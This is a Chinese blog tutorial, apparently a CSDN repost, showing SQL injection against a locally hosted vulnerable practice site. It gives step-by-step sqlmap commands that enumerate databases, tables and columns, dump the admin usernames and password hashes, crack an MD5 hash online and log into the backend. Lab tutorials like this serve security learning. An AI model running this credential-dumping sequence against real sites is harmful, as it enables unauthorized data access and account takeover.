SQL注入基础步骤及SQLMap工具使用(二)

SQL注入基础步骤及SQLMap工具使用()

一、环境搭建

(一)、phpstudy2018集成环境安装使用

安装使用,自行百度,下载地址:官网地址

1. http://phpstudy.php.cn/

(二)、SQL注入源码

百度网盘:

1. 链接:https://pan.baidu.com/s/1B0VSwXk6JnZbBpRgr5S3iQ 密码:wgze

 (三)、SQLMap

SQLMapKali Linux平台集成工具

图示:

 

(四)、图示

 

目标网站:

1. http://localhost/sqls/index.php?id=1

 

二、SQL注入过程详解

(一)、查找注入点

       前面已经讲过不在赘述,注入点:

1. 1.http://localhost/sqls/index.php?id=1

(二)、SQLMap测试注入

1. sqlmap -u "http://192.168.21.100/sqls/index.php?id=1"

结果:

 

 (三)、获取后台账号、密码

    1)、获取目标数据库

1. [email protected]:~# sqlmap -u "http://192.168.21.100/sqls/index.php?id=1" --dbs

图示:

 

2)、获取目标表名

[email protected]:~# sqlmap -u "http://192.168.21.100/sqls/index.php?id=1" -D test --tables

图示:

 

   3)、获取目标字段

1. [email protected]:~# sqlmap -u "http://192.168.21.100/sqls/index.php?id=1" -D test -T admin --columns

图示:

 

4)、获取字段内容

1. [email protected]:~# sqlmap -u "http://192.168.21.100/sqls/index.php?id=1" -D test -T admin -C "user,pwd" --dump

图示:

 

5)、MD5在线破解

网站:

1. http://www.cmd5.com/

结果:密码-qazxsw

三、登录后台

图示:

 

 

最后说明:

以上只是SQLMap简单实用,参考:https://blog.csdn.net/qq1124794084/article/details/77851094想了解更多,可自行百度。

1. 

 

1. 

 

1. 

 

1. 

 

2. 

 

1. 

 

1. 

 

1. 

 

1. 

 

1. 

 

 

 

发布了17 篇原创文章 · 获赞 3 · 访问量 2696

猜你喜欢

转载自blog.csdn.net/gaogzhen/article/details/80905995